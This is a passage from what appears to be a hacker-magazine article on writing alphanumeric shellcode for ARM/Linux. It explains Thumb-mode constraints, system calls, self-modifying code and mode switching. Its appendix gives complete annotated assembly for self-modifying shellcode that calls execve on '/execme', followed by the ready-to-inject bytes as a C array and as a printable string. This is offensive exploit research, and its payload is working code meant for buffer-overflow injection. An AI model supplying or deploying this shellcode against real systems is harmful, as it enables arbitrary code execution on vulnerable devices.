| 0| 1| 0| 0| 0| 0| 1| 0| 0| 0| Rm | Rn |
+--+--+--+--+--+--+--+--+--+--+-----+-----+
Since bit 7 and 6 are both set to 0, this means that bits 5 and 4
must be set to 1. This yields the following restrictions:
- Rm must be either: R6 or R7.
- If Rm is R6, then Rn can be any other low register.
- If Rm is R7, then Rn can only be R0 or R1.
An important instruction that is missing from the above list is the
SWI instruction. To be able to get around the fact that SWI is not
alphanumeric in Thumb mode, we overwrite it from ARM mode. However,
unlike the SWI in ARM mode, the argument to SWI will not be used to
determine the system call number that we want to call. Instead we
must place the system call number into R7. Unlike in ARM mode, where
we must add 0x900000 to the system call number, we can just place
the number in R7 as is.
An example of calling execve in ARM mode:
SWI 0x90000b
In Thumb mode:
MOV r7, #0x0b
SWI 48
----[ 2.9 Going to ARM Mode
For programs that we wish to exploit that are already running in
Thumb mode, we still have a problem: we can't write self-modifying
code in Thumb mode because we can't call SWI to perform a cache
flush. However, since the BX instruction is alphanumeric in Thumb
mode, we can use that instruction to get us into ARM mode where we
can do all the cool stuff we've discussed above. Here is an example
of a code snippet that gets us into ARM mode:
BX pc
ADD r7, #50
We need the add instruction as a nop instruction because PC will
point to the current instruction + 4. The BX pc instruction
will be represented alphanumerically as 'G''x'.
--[ 3. Conclusion
This article shows that alphanumeric shellcode is realistic on the
ARM processor, even though it is harder to generate because of the
nature of the ARM processor. Any operation, including non-alphanumeric
instructions, can be executed by writing self-modifying code and
flushing the instruction cache. Consequently, alphanumeric shellcode
is Turing complete.
The thumb instruction set can be used, if available, to facilitate
writing shellcode. Its denser instruction structure makes it somewhat
easier to make it generate alphanumeric bytes. However, having access
to the thumb instruction set is not required.
--[ 4. Acknowledgements
The authors would like to thank Frank Piessens, tetsuki and
tohomo for their contributions to the project which resulted
in this article.
We would also like to thank HD Moore for his helpful suggestions
when we were trying to make our shellcode printable.
Shoutouts to the people from nologin/uninformed: arachne, bugcheck,
dragorn, gamma, h1kari, hdm, icer, jhind, johnycsh, mercy, mjm,
mu-b, nemo, ninja405, pandzilla, pusscat, rizzo, rjohnson, sih,
skape, skywing, slow, trew, vf, warlord, wastedimage, west, X, xbud
--[ 5. References
[0] The ARM Architecture Reference Manual
http://www.arm.com/miscPDFs/14128.pdf
[1] Writing ia32 alphanumeric shellcodes
http://www.phrack.org/issues.html?issue=57&id=18#article
[2] Into my ARMs: Developing StrongARM/Linux shellcode
http://www.isec.pl/papers/into_my_arms_dsls.pdf
--[ A. Shellcode Appendix
----[ A.0 Writable Memory
For debugging purposes, it is convenient to execute the shellcode as a
normal application, instead of injecting it into a buffer. However, if
it's compiled as a normal application, the code will be loaded in
non-writable code memory. Since our shellcode is self-modifying, the
application will first have to set the memory to writable before executing
the code. This can be done with the following code fragment:
.ARM
# set the text section writable
MOV r0, #32768
MOV r1, #4096
MOV r2, #7
BL mprotect
Of course, this is not necessary when the shellcode is injected through a
buffer overflow. The memory that contains the buffer will always be
writable.
----[ A.1 Example Shellcode
In this example, the shellcode starts up, switches to thumb mode and
executes the application "/execme". Some of the techniques presented
here are: getting a known value into a register, modifying our own
shellcode, flushing the instruction cache, and switching from ARM
to Thumb.
# our shellcode starts here
# nops
SUBPL r3, r1, #56
SUBPL r3, r1, #56
# do not change these instructions
# we will use them to load a value
# into our register
SUBPL r3, r1, #56
SUBPL r3, r1, #56
# continue nops
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
SUBPL r3, r1, #56
# we can't load directly from
# PC so we must get PC into r3
# we do this by subtracting 48
# from PC
SUBMI r3, pc, #48
SUBPL r3, pc, #48
# load 56 into r3
LDRPLB r3, [r3, #-48]
LDRMIB r3, [r3, #-48]
# Set r5 to -1
# update the flags: result is negative
# so we know we need MI from now on
SUBMIS r5, r3, #57
SUBPLS r5, r3, #57
# r7 to stackpointer
SUBMI r7, SP, #48
# Set r3 to 0
# set positive flag
SUBMIS r3, r3, #56
# set r4 to 0
SUBPL r4, r3, r3, ROR #2
# Set r6 to 0
SUBPL r6, r4, r4, ROR #2
# store registers to stack
STMPLFD r7, {r0, r4, r5, r6, r8, lr}^
# r5 to -121
SUBPL r5, r4, #121
# copy PC to r6
SUBPL r6, PC, r5, ROR #2
SUBPL r6, r6, r5, ROR #2
SUBPL r6, r6, r5, ROR #2
SUBPL r6, r6, r5, ROR #2
SUBPL r6, r6, r5, ROR #2
SUBPL r6, r6, r5, ROR #2
SUBPL r6, r6, r5, ROR #2
# write 0 to SWI 0x414141
# becomes: SWI 0x410041
# OFFSET USED HERE
# IF CODE CHANGES, CHANGE OFFSET
STRPLB r3, [r6, #-100]
# put 56 back into r3
# we are positive after this
EORPLS r3, r3, #56
SUBPL r7, r3, #57
# write 9F to SWI 0x410041
# becomes SWI 0x9F0041
# we are negative after this
EORPLS r5, r7, #80
# negative
EORMIS r5, r5, #48
# OFFSET USED HERE
# IF CODE CHANGES, CHANGE OFFSET
STRMIB r5, [r6, #-99]
# write 2 to SWI 0x9F0041
# becomes SWI 0x9F0002
SUBMI r5, r3, #54
STRMIB r5, [r6, #-101]
# write 0x16 to 0x41303030
# becomes 0x41303016
# positive
EORMIS r5, r3, #66
EORPLS r5, r5, #108
# OFFSET USED HERE
# IF CODE CHANGES, CHANGE OFFSET
STRPLB r5, [r6, #-89]
# write 2F to 0x41303016
# becomes 0x412F3016
EORPLS r5, r3, #86
EORPLS r5, r5, #65
# OFFSET USED HERE
# IF CODE CHANGES, CHANGE OFFSET
STRPLB r5, [r6, #-87]
# write FF to 0x412FFF16
# becomes 0x412FFF16 (BXPL r6)
# OFFSET USED HERE
# IF CODE CHANGES, CHANGE OFFSET
STRPLB r7, [r6, #-88]
# r7 = -1
# set r3 to -121
SUBPL r3, r7, #120
#
SUBPL r6, r6, r3, ROR #2
# write DF for swi to 0x3030
# becomes 0xDF30 (SWI 48)
# becomes negative
EORPLS r5, r7, #97
EORMIS r5, r5, #65
# OFFSET USED HERE
# IF CODE CHANGES, CHANGE OFFSET
STRMIB r5, [r6, #-73]
# Set positive flag
EORMIS r7, r4, #56
# load arguments for SWI
# r0 = 0, r1 = -1, r2 = 0
SUBPL r5, SP, #48
# We use LDMPLFA, because it's one of the few instructions
# we can use to write to the registers R0 to R2.
# Other instructions generate non-alphanumeric characters
LDMPLFA r5!, {r0, r1, r2, r6, r8, lr}
# Set r7 to -1
# Negative after this
SUBPLS r7, r7, #57
# This will become:
# SWIMI 0x9f0002
SWIMI 0x414141
# Set positive flag again
EORMIS r5, r4, #56
# set thumb mode
SUBPL r6, pc, r7, ROR #2
# this should be BXPL r6
# but in hex that's
# 0x51 0x2f 0xff 0x16, so we
# overwrite the 0x30 above
.byte 0x30,0x30,0x30,0x51
.THUMB
.ALIGN 2
# We assume r2 is 0 before
# entering Thumb mode
# copy pc to r0
mov r0, pc
# OFFSET USED HERE
# IF CODE CHANGES, CHANGE OFFSET
# misalign r0 to address of 1execme2 - 47
# we will write to r0+47 and r0+54
# (beginning of the string)
add r0, #100
sub r0, #105
# set r1 to 0
mul r1, r2
# set r1 tp 47
add r1, #97
sub r1, #50
# store r1 ('/') at r0+47
# string becomes /execme2
strb r1, [r0, r1]
# set r1 to 0
mul r1, r2
# set r1 to 54
add r1, #54
# store 0 at r0+54
# string becomes /execme\0
strb r2, [r0, r1]
# set r1 to 0
mul r1, r2
# set r1 to -1
add r1, #48
sub r1, #49
# set r7 to 1
neg r7, r1
# set r1 to 0
mul r1, r2
# set r1 to 11 (0xb),
# the exec system call code
add r1, #65
sub r1, #54
# our systemcall code must be in r7
# r7 = 1, r1 contains the code
mul r7, r1
# set r1 to 0 (first parameter of execve)
mul r1, r2
# set r0 to beginning of the string
add r0, #97
sub r0, #50
# This wil become: swi 48
.byte 0x30,0x30
# This is a nop used for
# alignment
add r7, #50
# our command
.ascii "1execme2"
# nops used for alignment
add r7, #50
add r7, #50
----[ A.2 Resulting Bytes
char shellcode[] = "\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
"\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
"\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
"\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
"\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
"\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
"\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
"\x52\x30\x30\x4f\x42\x30\x30\x4f\x52\x30\x30\x53\x55\x30\x30\x53"
"\x45\x39\x50\x53\x42\x39\x50\x53\x52\x30\x70\x4d\x42\x38\x30\x53"
"\x42\x63\x41\x43\x50\x64\x61\x44\x50\x71\x41\x47\x59\x79\x50\x44"
"\x52\x65\x61\x4f\x50\x65\x61\x46\x50\x65\x61\x46\x50\x65\x61\x46"
"\x50\x65\x61\x46\x50\x65\x61\x46\x50\x65\x61\x46\x50\x64\x30\x46"
"\x55\x38\x30\x33\x52\x39\x70\x43\x52\x50\x50\x37\x52\x30\x50\x35"
"\x42\x63\x50\x46\x45\x36\x50\x43\x42\x65\x50\x46\x45\x42\x50\x33"
"\x42\x6c\x50\x35\x52\x59\x50\x46\x55\x56\x50\x33\x52\x41\x50\x35"
"\x52\x57\x50\x46\x55\x58\x70\x46\x55\x78\x30\x47\x52\x63\x61\x46"
"\x50\x61\x50\x37\x52\x41\x50\x35\x42\x49\x50\x46\x45\x38\x70\x34"
"\x42\x30\x50\x4d\x52\x47\x41\x35\x58\x39\x70\x57\x52\x41\x41\x41"
"\x4f\x38\x50\x34\x42\x67\x61\x4f\x50\x30\x30\x30\x51\x78\x46\x64"
"\x30\x69\x38\x51\x43\x61\x31\x32\x39\x41\x54\x51\x43\x36\x31\x42"
"\x54\x51\x43\x30\x31\x31\x39\x4f\x42\x51\x43\x41\x31\x36\x39\x4f"
"\x43\x51\x43\x61\x30\x32\x38\x30\x30\x32\x37\x31\x65\x78\x65\x63"
"\x6d\x65\x32\x32\x37\x32\x37";
80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR
80AR80AR80AR80AR80AR80AR80AR80AR80AR00OB00OR00SU00SE9PSB9PSR0pMB80SBcACP
daDPqAGYyPDReaOPeaFPeaFPeaFPeaFPeaFPeaFPd0FU803R9pCRPP7R0P5BcPFE6PCBePFE
BP3BlP5RYPFUVP3RAP5RWPFUXpFUx0GRcaFPaP7RAP5BIPFE8p4B0PMRGA5X9pWRAAAO8P4B
gaOP000QxFd0i8QCa129ATQC61BTQC0119OBQCA169OCQCa02800271execme22727
--------[ EOF